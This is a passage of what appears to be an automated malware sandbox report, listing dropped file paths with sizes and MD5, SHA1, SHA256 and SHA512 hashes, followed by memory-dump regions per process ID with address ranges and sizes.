                                        de705394ba148fca46930b4a41a457ffcc814abbba3f05d7987b0654f963512258a7fb8a3f0f9559b52b5f942249cc6bc5d3dc30951088d5479b45e2f4607a86

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        1KB

                                        MD5

                                        1455c830f458e6307bbf399a88f90347

                                        SHA1

                                        afa7bba73ff8db19c137a7c7567cb36c76cb9745

                                        SHA256

                                        febc6b1562986fd20c04a3d1bba26c872203c43de4c3cfb437a3cdb769d50dfd

                                        SHA512

                                        6ff8ec029472aa740ced62246386c760bfd1c4cc88a8654bebc919736b66ccd8ba6f201e6b1ba1b31c81082e8d6ea24a7ef628c1b7203bab4e785383ca46793d

                                      • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                        Filesize

                                        40B

                                        MD5

                                        834c26f08297928e7b33d0caa84181e2

                                        SHA1

                                        5767b361852a068260026ff8340e9e57940ccd86

                                        SHA256

                                        c31fdb1eeb1419913d8d60106a9420bff83a95d705e540109930c35350f125da

                                        SHA512

                                        5bc65dadf9bab16f25427ff9dcb5653ed9ed529bfe43546793e0fd81fa48f7905262d77d92f7588a829ac552dd21f94ed5ed9c42ce6082932964e82357a52e5b

                                      • C:\Windows\Installer\Razer Central\RCUninstall\uninstall.xml

                                        Filesize

                                        46KB

                                        MD5

                                        87fbb4d0c6506c8b2fd669c6c8da0063

                                        SHA1

                                        d4925b0f23d1bd855306ca49605ae79a2e126232

                                        SHA256

                                        b1bea314e73079aecfb1055ca3bdd3a26c977165339b34bfa0aa97fe6699f17f

                                        SHA512

                                        788448a66e723b133e81532bcfe713776636f4c96c69a901ee5e640e15f736a6e712bec1daecb399e8538c325e8e422e38a23f3406ed5ca65d62943ca8483479

                                      • C:\Windows\Installer\{0CD55593-F275-4aea-92B2-9170B5A14644}\RC\RzRC_install.log

                                        Filesize

                                        57KB

                                        MD5

                                        22e6290039709b17e8cd913f5852d0ec

                                        SHA1

                                        51e9d8160e371d8fa6b236175d1eaf566f6415f7

                                        SHA256

                                        f6a413d04d3bff271b01f39661a123b5635a464437fbab6ef1737b55a67207b4

                                        SHA512

                                        655580044ad59140a8fa05eb71c869f58add80b524b89efbe7a257259656b5af638c72b5365af99eb289f0c52a25485bacbb3ec4374e6284e722f85626327bfe

                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        4KB

                                        MD5

                                        bdb25c22d14ec917e30faf353826c5de

                                        SHA1

                                        6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                        SHA256

                                        e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                        SHA512

                                        b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        b42c70c1dbf0d1d477ec86902db9e986

                                        SHA1

                                        1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                        SHA256

                                        8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                        SHA512

                                        57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                      • memory/468-354-0x000001C67C7D0000-0x000001C67C885000-memory.dmp

                                        Filesize

                                        724KB

                                      • memory/852-242-0x0000020E7DEF0000-0x0000020E7DF12000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1512-125-0x00000000068E0000-0x000000000692C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/1512-123-0x0000000006870000-0x00000000068D8000-memory.dmp

                                        Filesize

                                        416KB

                                      • memory/1512-64-0x0000000000750000-0x000000000079A000-memory.dmp

                                        Filesize

                                        296KB

                                      • memory/1512-70-0x0000000005A20000-0x0000000005AB2000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/1512-117-0x00000000050F0000-0x0000000005140000-memory.dmp

                                        Filesize

                                        320KB

                                      • memory/1512-116-0x0000000005330000-0x00000000053C2000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/1512-118-0x0000000006970000-0x0000000006F14000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/1512-119-0x0000000006430000-0x0000000006452000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1512-124-0x00000000072B0000-0x0000000007604000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/1512-130-0x00000000079F0000-0x0000000007A2C000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/1512-133-0x0000000008AF0000-0x0000000008CB2000-memory.dmp

                                        Filesize

                                        1.8MB

                                      • memory/1512-131-0x00000000079B0000-0x00000000079D1000-memory.dmp

                                        Filesize

                                        132KB

                                      • memory/1512-227-0x0000000005C30000-0x0000000005C96000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/1512-234-0x0000000006FA0000-0x0000000007016000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/1512-235-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/1852-482-0x0000000000200000-0x0000000000326000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1992-468-0x00007FF78E590000-0x00007FF78E5A6000-memory.dmp

                                        Filesize

                                        88KB

                                      • memory/2208-51-0x0000000000400000-0x00000000004D8000-memory.dmp

                                        Filesize

                                        864KB

                                      • memory/2208-267-0x0000000000400000-0x00000000004D8000-memory.dmp

                                        Filesize

                                        864KB

                                      • memory/2232-360-0x00007FF7199F0000-0x00007FF719D82000-memory.dmp

                                        Filesize

                                        3.6MB

                                      • memory/2232-321-0x00007FF7199F0000-0x00007FF719D82000-memory.dmp

                                        Filesize

                                        3.6MB

                                      • memory/2336-280-0x00007FF759CA0000-0x00007FF75A032000-memory.dmp

                                        Filesize

                                        3.6MB

                                      • memory/2336-241-0x00007FF759CA0000-0x00007FF75A032000-memory.dmp

                                        Filesize

                                        3.6MB

                                      • memory/2640-319-0x000002A2F0060000-0x000002A2F0115000-memory.dmp

                                        Filesize

                                        724KB

                                      • memory/2640-318-0x000002A2F0040000-0x000002A2F005C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/2640-320-0x000002A2F0120000-0x000002A2F012A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2640-326-0x000002A2F0290000-0x000002A2F02AC000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/2640-327-0x000002A2F0270000-0x000002A2F027A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2640-328-0x000002A2F02D0000-0x000002A2F02EA000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/2640-329-0x000002A2F0280000-0x000002A2F0288000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2640-330-0x000002A2F02B0000-0x000002A2F02B6000-memory.dmp

                                        Filesize

                                        24KB

                                      • memory/2640-331-0x000002A2F02C0000-0x000002A2F02CA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/3528-50-0x0000000000400000-0x0000000002BF8000-memory.dmp

                                        Filesize

                                        40.0MB

                                      • memory/3836-490-0x0000000000400000-0x00000000004D8000-memory.dmp

                                        Filesize

                                        864KB

                                      • memory/4204-1218-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1316-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1423-0x00007FF698820000-0x00007FF698830000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1417-0x00007FF698820000-0x00007FF698830000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1403-0x00007FF66B590000-0x00007FF66B5A0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1402-0x00007FF66B590000-0x00007FF66B5A0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1398-0x00007FF66B590000-0x00007FF66B5A0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1369-0x00007FF698820000-0x00007FF698830000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1344-0x00007FF64AA20000-0x00007FF64AA30000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1359-0x00007FF66B590000-0x00007FF66B5A0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1346-0x00007FF64AA20000-0x00007FF64AA30000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1342-0x00007FF64AA20000-0x00007FF64AA30000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1331-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1328-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1327-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1326-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1330-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1329-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1320-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1319-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1318-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1314-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1428-0x00007FF698820000-0x00007FF698830000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1410-0x00007FF65DEF0000-0x00007FF65DF00000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1332-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1321-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1315-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1425-0x00007FF698820000-0x00007FF698830000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1290-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1291-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1293-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1292-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1217-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1219-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1250-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1251-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1220-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4204-1223-0x00007FF670460000-0x00007FF670470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4676-325-0x0000000003640000-0x0000000003780000-memory.dmp

                                        Filesize

                                        1.2MB

                                      • memory/4676-268-0x0000000000400000-0x000000000071C000-memory.dmp

                                        Filesize

                                        3.1MB

                                      • memory/4676-368-0x0000000003640000-0x0000000003780000-memory.dmp

                                        Filesize

                                        1.2MB

                                      • memory/4676-541-0x0000000000400000-0x000000000071C000-memory.dmp

                                        Filesize

                                        3.1MB

                                      • memory/4676-370-0x0000000000400000-0x000000000071C000-memory.dmp

                                        Filesize

                                        3.1MB

                                      • memory/4676-276-0x0000000003640000-0x0000000003780000-memory.dmp

                                        Filesize

                                        1.2MB

                                      • memory/4676-299-0x0000000000400000-0x000000000071C000-memory.dmp

                                        Filesize

                                        3.1MB

                                      • memory/4676-297-0x0000000003640000-0x0000000003780000-memory.dmp

                                        Filesize

                                        1.2MB

                                      • memory/4900-477-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp

                                        Filesize

                                        8.0MB

                                      • memory/4900-469-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp

                                        Filesize

                                        8.0MB

                                      • memory/4900-1255-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp

                                        Filesize

                                        8.0MB

                                      • memory/4900-359-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp

                                        Filesize

                                        8.0MB

                                      • memory/4900-364-0x0000017EA3A60000-0x0000017EA3A80000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4976-7470-0x0000000000630000-0x0000000000A18000-memory.dmp

                                        Filesize

                                        3.9MB

                                      • memory/4976-5748-0x0000000000630000-0x0000000000A18000-memory.dmp

                                        Filesize

                                        3.9MB

                                      • memory/4976-4373-0x0000000000630000-0x0000000000A18000-memory.dmp

                                        Filesize

                                        3.9MB

                                      • memory/5440-7475-0x0000000002C40000-0x0000000002C86000-memory.dmp

                                        Filesize

                                        280KB

                                      • memory/5440-7558-0x0000000005A70000-0x0000000005A88000-memory.dmp

                                        Filesize

                                        96KB

                                      • memory/5440-7473-0x0000000000290000-0x00000000009AE000-memory.dmp

                                        Filesize

                                        7.1MB

                                      • memory/5440-7474-0x000000000A720000-0x000000000B926000-memory.dmp

                                        Filesize

                                        18.0MB

                                      • memory/5440-7547-0x00000000053A0000-0x00000000053DC000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/5440-7546-0x0000000005210000-0x0000000005222000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/5440-7556-0x00000000059B0000-0x0000000005A58000-memory.dmp

                                        Filesize

                                        672KB

                                      • memory/5500-7906-0x0000000005600000-0x00000000056B0000-memory.dmp

                                        Filesize

                                        704KB

                                      • memory/5500-7900-0x0000000005640000-0x00000000056EE000-memory.dmp

                                        Filesize

                                        696KB

                                      • memory/5500-7866-0x0000000000A40000-0x0000000000B30000-memory.dmp

                                        Filesize

                                        960KB

                                      • memory/6016-7587-0x00000000052E0000-0x00000000052EA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/6016-7618-0x0000000005D80000-0x0000000005DC4000-memory.dmp

                                        Filesize

                                        272KB

                                      • memory/6016-7580-0x0000000005280000-0x0000000005288000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7579-0x0000000005240000-0x0000000005248000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7581-0x00000000052A0000-0x00000000052A8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7582-0x00000000052B0000-0x00000000052B8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7583-0x0000000005290000-0x0000000005298000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7585-0x0000000005300000-0x0000000005340000-memory.dmp

                                        Filesize

                                        256KB

                                      • memory/6016-7590-0x0000000005440000-0x000000000547A000-memory.dmp

                                        Filesize

                                        232KB

                                      • memory/6016-7589-0x00000000053D0000-0x0000000005400000-memory.dmp

                                        Filesize

                                        192KB

                                      • memory/6016-7588-0x0000000005380000-0x000000000539C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/6016-4829-0x00000000045B0000-0x00000000045D0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/6016-7586-0x0000000005340000-0x000000000535E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/6016-7591-0x0000000005400000-0x0000000005424000-memory.dmp

                                        Filesize

                                        144KB

                                      • memory/6016-7603-0x0000000005850000-0x0000000005858000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7602-0x0000000005840000-0x0000000005848000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7601-0x0000000005830000-0x0000000005838000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7576-0x0000000005250000-0x0000000005278000-memory.dmp

                                        Filesize

                                        160KB

                                      • memory/6016-7625-0x0000000007200000-0x0000000008624000-memory.dmp

                                        Filesize

                                        20.1MB

                                      • memory/6016-4826-0x0000000004560000-0x0000000004582000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/6016-7577-0x00000000051D0000-0x00000000051D8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7652-0x0000000005ED0000-0x0000000005F82000-memory.dmp

                                        Filesize

                                        712KB

                                      • memory/6016-7578-0x0000000005220000-0x0000000005228000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/6016-7574-0x00000000051A0000-0x00000000051B0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/6016-7575-0x00000000051B0000-0x00000000051BC000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/6016-7573-0x00000000051E0000-0x0000000005216000-memory.dmp

                                        Filesize

                                        216KB

                                      • memory/6016-7571-0x0000000005170000-0x0000000005198000-memory.dmp

                                        Filesize

                                        160KB

                                      • memory/6016-7572-0x00000000049E0000-0x00000000049EA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/6016-7570-0x0000000005150000-0x000000000516C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/6016-8003-0x00000000066D0000-0x0000000006A24000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/6016-4828-0x0000000004540000-0x000000000454C000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/6016-4827-0x00000000045E0000-0x0000000004626000-memory.dmp

                                        Filesize

                                        280KB

                                      • memory/6016-4825-0x0000000000F10000-0x0000000000F96000-memory.dmp

                                        Filesize

                                        536KB